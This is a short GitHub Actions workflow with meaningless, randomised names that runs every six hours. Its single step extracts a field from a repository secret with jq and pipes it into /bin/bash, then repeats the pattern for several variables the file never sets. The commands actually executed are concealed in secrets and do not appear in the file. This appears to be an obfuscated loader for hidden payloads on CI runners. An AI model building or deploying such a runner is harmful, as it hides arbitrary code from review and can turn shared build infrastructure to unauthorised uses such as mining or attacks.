name: chenyatou0987

on:
  workflow_dispatch:
  schedule:
    - cron: '38 4/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: chenyatou0987
        env:
          qfxfe51363: ${{ secrets.qfxfe51363 }}
        run: |
          echo $qfxfe51363 | jq -r .bx1300 | /bin/bash
          echo $wqqv9807 | jq -r .nijgv325 | /bin/bash
          echo $mus64839 | jq -r .by133 | /bin/bash
          echo $m25 | jq -r .dk64 | /bin/bash
          echo $mo37 | jq -r .mbt310 | /bin/bash
          echo $xejq026 | jq -r .e89135 | /bin/bash
          echo $g2 | jq -r .fc5 | /bin/bash
          echo $ld0 | jq -r .e3691 | /bin/bash

